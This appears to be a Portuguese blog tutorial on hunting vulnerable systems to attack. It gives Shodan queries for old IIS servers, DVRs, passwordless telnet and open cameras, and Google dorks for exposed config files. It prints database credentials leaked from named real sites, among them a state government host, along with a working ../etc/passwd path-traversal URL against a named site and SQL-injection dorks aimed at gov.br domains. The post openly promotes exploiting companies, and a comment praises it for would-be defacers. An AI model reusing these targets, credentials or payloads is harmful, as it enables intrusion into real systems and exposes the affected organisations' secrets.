Música da semana

Ha Tempos by Legião Urbana on Grooveshark

Vulnerabilidade Research

Olá a todos, neste tutorial eu vou mostrar como encontrar varias vulnerabilidades em cms, web , serviços remoto e etc... algumas coisas básicas outras avançadas no entanto tudo é vuln do mesmo jeito . Aqui neste tutorial você vai ter uma ideia de como é faicil invadir sistemas hoje .

Além do Google Hacking Database ( http://www.exploit-db.com/google-dorks/ ) e outros serviços do gênero existem varios outros serviços voltados a pesquisa de vulnerabilidades. Vou começar postando um sistema web only de buscar por vulnerabilidades muito GOOD em especial pra quem gosta de brincar com metasploit, agora vc pode passar o dia todo exploitando empresas e sites comum basta saber pesquisar, bem eu estou falando do ( SHODAN - Computer Search Engine ) www.shodanhq.com desenvolvido por
http://twitter.com/#!/achillean vamos aos exemplos de pesquisa, vc algumas vez ja encontrou um servi rodando o IIS 1.0 pelo google ? quase impossivel né, mais com o SHODAN quase todas os serviços vuln é possivel pesquisar, vejamos alguns exemplos :

http://shodan.surtri.com/?q="iis/1.0";
http://shodan.surtri.com/?q="iis/2.0";
http://shodan.surtri.com/?q="iis/3.0";
http://shodan.surtri.com/?q="iis/4.0";
Veja o resultado vai se surpreender, vamos a outros exemplos .

Aparelhos DVR com interface WEB exposta:
http://shodan.surtri.com/?q=DVR

Máquinas com busybox telnet sem senha:
http://shodan.surtri.com/?q=port%3A23+%22list+of+built-in+commands%22)

Cameras de Segurança abertas na Internet:
http://shodan.surtri.com/?q=port%3A80+%22Camera%22+%22HTTP%2F1.0+200+OK%22

Agora vc pode combinar os novas falhas e 0days que sai em sites de exploits e usar o SHODAN para pesquisar serviços vulneraveis .

Vejam algumas outros exemplos de busca postado em um site voltado a pentest

http://www.pentestit.com/shodan-queries/

Encontrando arquivos senssíveis (GOOD)

Dorks: allinurl:/conecta_mysql.inc - intext:db filetype:inc -

http://www.ezsitebuilder.com/php/db.inc

//$host = "db1.actadivina.com";
//$host = "localhost";
//$db_name = "QS_devil";
//$db_name = "Authors";

http://smlick.net/include/db.inchttp://smlick.net/include/db2.inc

$user = 'root';
$pass = 'orange';
$host = "localhost";
$db_name = 'hanc'

Olha esse aqui, qui legal, pena que pra conectar tem que tar dentro da rede interna deles, se obter acesso a algum site do mesmo servi vc pode conectar .
http://www.pge.mt.gov.br/novosite2/biblioteca/conexao.inc

$db = mysql_connect("192.168.3.80", "root", "cpdpge");

http://gaia.saude.mg.gov.br/conf_pentagrama/conf_site.inc
-
http://www.webfocobrasil.com.br/clientes/schimitt/conecta_mysql.inc
-
http://www.afp.mil.ph/Nolcom/Include/db_connect.inc

Como são varios sites eu vou por só um exemplo de dork que ja contem varios vuln no google .

d0rk: inurl:download_file.php?file= site:hr
-
demo: www.politologija.hr/download_file.php?file=../../../../../../../../../../../../etc/passwd .



Encontrando Falhas de SQL-Injection (interessante) .

Muita gente ja fez vídeos, tutoriais com novas dorks e tal, aqui eu vou mostrar somente uma que vale por todas :

inurl:*.php?id=

isso mesmo, dái vc ja pode incrementar mais especificando de qual dóminio vc quer fazer a busca, exemplos; dóminios com.br,gov.br e org e varios outros .

site:gov.br inurl:*.php?id=

Explicação : nesses exemplo, observe que ao invéis de por noticia.php?id= ou pagina.php?id= ou qualquermerda.php?id= eu simplesmente coloco um "*" isso quer dizer que pode vir qualquer coisa .

Simplesmente pesquise no google por: inurl:"search.php?q=" - inurl:"search.asp?q=" - inurl:"buscar.php?q="

daí ja da uma noção para novas dorks né ?

1 comentários:

Tutorial muito bom para quem quer começar aprender Defacer

Postar um comentário

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More